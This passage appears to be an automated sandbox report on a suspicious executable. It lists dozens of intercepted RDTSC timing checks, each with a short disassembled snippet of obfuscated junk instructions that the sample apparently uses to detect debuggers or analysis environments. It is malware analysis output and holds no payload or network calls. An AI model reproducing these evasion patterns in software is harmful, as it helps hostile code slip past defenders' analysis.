              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9C08 second address: 4C9C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jl 00007FB5613DF5ACh 0x00000013 push esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop esi 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jng 00007FB5613DF5AEh 0x00000022 mov eax, dword ptr [eax] 0x00000024 jg 00007FB5613DF5B9h 0x0000002a jmp 00007FB5613DF5B3h 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 pushad 0x00000034 push esi 0x00000035 pushad 0x00000036 popad 0x00000037 pop esi 0x00000038 jnp 00007FB5613DF5ACh 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE052 second address: 4CE058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE058 second address: 4CE067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5613DF5ABh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE6D1 second address: 4CE6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE6D5 second address: 4CE70F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5ABh 0x00000007 jnl 00007FB5613DF5A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pushad 0x00000011 jmp 00007FB5613DF5ABh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB5613DF5B4h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE70F second address: 4CE732 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB560E14CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB560E14CE7h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE732 second address: 4CE736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CEBA6 second address: 4CEBBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB560E14CD6h 0x0000000a jmp 00007FB560E14CDCh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CECFB second address: 4CED01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CED01 second address: 4CED05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CED05 second address: 4CED18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5AAh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CEFFD second address: 4CF022 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB560E14CD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB560E14CE1h 0x00000013 jne 00007FB560E14CD6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6A6E second address: 4D6A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6A74 second address: 4D6AA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB560E14CE9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edi 0x00000013 jmp 00007FB560E14CDCh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D558B second address: 4D5590 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5AD9 second address: 4D5AE3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB560E14CDEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5EE4 second address: 4D5EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5EEE second address: 4D5EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5EF4 second address: 4D5EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D62EF second address: 4D62F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D68A7 second address: 4D68BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5613DF5B4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D68BF second address: 4D68EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14CE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FB560E14CD8h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pushad 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D68EA second address: 4D68F8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB5613DF5A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB926 second address: 4DB93D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14CE1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB93D second address: 4DB95E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FB5613DF5A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007FB5613DF5ADh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB95E second address: 4DB99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB560E14CDFh 0x00000009 popad 0x0000000a jmp 00007FB560E14CE9h 0x0000000f jbe 00007FB560E14CDCh 0x00000015 js 00007FB560E14CD6h 0x0000001b push eax 0x0000001c push edx 0x0000001d jnl 00007FB560E14CD6h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DBAFA second address: 4DBB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FB5613DF5A6h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DBB07 second address: 4DBB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FB560E14CD6h 0x0000000a jo 00007FB560E14CD6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC4EF second address: 4DC4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC943 second address: 4DC947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4A3A second address: 4E4A40 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5A2E second address: 482320 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FB560E14CE8h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FB560E14CD8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov edx, dword ptr [ebp+122D290Dh] 0x00000030 call dword ptr [ebp+122D1B33h] 0x00000036 jmp 00007FB560E14CDBh 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FB560E14CE5h 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FB560E14CE9h 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5E3D second address: 4A5E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB5613DF5A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5FF4 second address: 4A601B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB560E14CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 495B5F10h 0x00000012 pushad 0x00000013 jg 00007FB560E14CD9h 0x00000019 popad 0x0000001a push E14F619Fh 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A601B second address: 4A601F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6461 second address: 4A64CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnc 00007FB560E14CD6h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FB560E14CD8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f push 00000004h 0x00000031 jmp 00007FB560E14CE7h 0x00000036 nop 0x00000037 je 00007FB560E14CDEh 0x0000003d ja 00007FB560E14CD8h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jno 00007FB560E14CDCh 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6825 second address: 4A6867 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FB5613DF5A8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 add dword ptr [ebp+12452BF6h], ebx 0x0000002d push 0000001Eh 0x0000002f push eax 0x00000030 pushad 0x00000031 push esi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6BB2 second address: 4A6BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FB560E14CE5h 0x0000000e jmp 00007FB560E14CDFh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55101C second address: 55103F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB560CBB808h 0x00000008 jl 00007FB560CBB7F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55443F second address: 55444C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB560E14C36h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55444C second address: 554454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557AF2 second address: 557AF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564748 second address: 56474D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567716 second address: 56771C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C40C second address: 45C41A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FB560CBB7F8h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C41A second address: 45C420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C420 second address: 45C426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C426 second address: 45C42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C42A second address: 45C434 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C434 second address: 45C43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB560E14C36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45C43E second address: 45C459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB560CBB7FFh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562349 second address: 562356 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562356 second address: 56235C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56235C second address: 562360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562360 second address: 562374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FB560CBB7FCh 0x0000000e jnl 00007FB560CBB7F6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577461 second address: 577479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB560E14C44h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577002 second address: 577007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577007 second address: 57703C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jne 00007FB560E14C36h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FB560E14C40h 0x00000016 jl 00007FB560E14C3Ch 0x0000001c jnp 00007FB560E14C36h 0x00000022 ja 00007FB560E14C42h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57703C second address: 577063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB560CBB7F6h 0x0000000a pushad 0x0000000b jmp 00007FB560CBB808h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577192 second address: 577197 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577197 second address: 57719D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C44A second address: 58C44E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C44E second address: 58C456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C6FA second address: 58C728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14C49h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB560E14C41h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58C9D1 second address: 58C9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58FC0B second address: 58FC94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c jc 00007FB560E14C45h 0x00000012 pop esi 0x00000013 nop 0x00000014 xor dx, A026h 0x00000019 push 00000004h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007FB560E14C38h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 clc 0x00000036 mov dword ptr [ebp+122D2B12h], esi 0x0000003c call 00007FB560E14C39h 0x00000041 jmp 00007FB560E14C3Bh 0x00000046 push eax 0x00000047 pushad 0x00000048 pushad 0x00000049 jng 00007FB560E14C36h 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 popad 0x00000052 push esi 0x00000053 pushad 0x00000054 popad 0x00000055 pop esi 0x00000056 popad 0x00000057 mov eax, dword ptr [esp+04h] 0x0000005b pushad 0x0000005c push esi 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58FC94 second address: 58FCE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FB560CBB806h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jbe 00007FB560CBB7FEh 0x00000017 push edi 0x00000018 jnp 00007FB560CBB7F6h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 jp 00007FB560CBB802h 0x0000002a jmp 00007FB560CBB7FCh 0x0000002f pushad 0x00000030 je 00007FB560CBB7F6h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591244 second address: 591257 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB560E14C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007FB560E14C36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591257 second address: 59125F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59125F second address: 591264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 593013 second address: 59302F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB7FEh 0x00000007 jl 00007FB560CBB7F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59302F second address: 593041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB560E14C3Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00284 second address: 4C002A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB801h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB560CBB7FDh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C002A9 second address: 4C00331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cl, bl 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FB560E14C46h 0x00000014 sbb si, BC08h 0x00000019 jmp 00007FB560E14C3Bh 0x0000001e popfd 0x0000001f jmp 00007FB560E14C48h 0x00000024 popad 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 jmp 00007FB560E14C40h 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FB560E14C47h 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00331 second address: 4C0036B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB560CBB808h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0036B second address: 4C0036F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0036F second address: 4C00375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C003DC second address: 4C0040B instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007FB560E14C43h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f mov bl, 2Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB560E14C3Eh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0040B second address: 4C0040F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0040F second address: 4C00426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB560E14C3Dh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00426 second address: 4C0044C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB801h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB560CBB7FDh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0D73 second address: 4A0D8A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB560E14C38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FB560E14C36h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0D8A second address: 4A0D94 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB560CBB7F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
